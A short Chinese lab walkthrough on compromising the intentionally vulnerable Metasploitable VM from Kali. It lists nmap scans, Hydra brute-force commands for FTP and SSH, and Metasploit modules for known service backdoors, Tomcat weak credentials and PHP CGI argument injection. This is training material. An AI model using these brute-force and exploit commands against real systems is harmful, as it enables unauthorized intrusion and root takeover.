1. 程式人生 > >kali滲透metasploitable靶機

kali滲透metasploitable靶機

掃描階段:

工具:Nmap

隱蔽掃描      nmap  -sS 192.168.8.135


埠爆破:FTP、SSH等

工具:Hydra

備用字典

  • 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

  • 爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陸系統:

埠滲透:

  • 6667——-irc_3281_backdoor

利用metasploit

成功獲取會話,root許可權

  • 6200——-vsftpd_234_backdoor

利用metasploit

反彈會話,root許可權


  • 1524——-ingrelock_backdoor

利用telnet連線1524,直接返回root會話

  • 1099——-distcc程式漏洞—-ingrelock

利用metasploit

返回會話

  • 139——-samba為3.0漏洞

先用nmap進行詳細掃描

nmap -v -A -T4 192.168.8.135

Samba 3.0.20

利用metasploit

返回會話,root許可權

  • 8180——-Apache Tomcat弱口令

使用use auxiliary/scanner/http/tomcat_mgr_login進行賬戶爆破

用預設自帶的字典即可

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模組

獲取meterpreter會話

  • 80——-PHP CGI引數注入執行漏洞

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run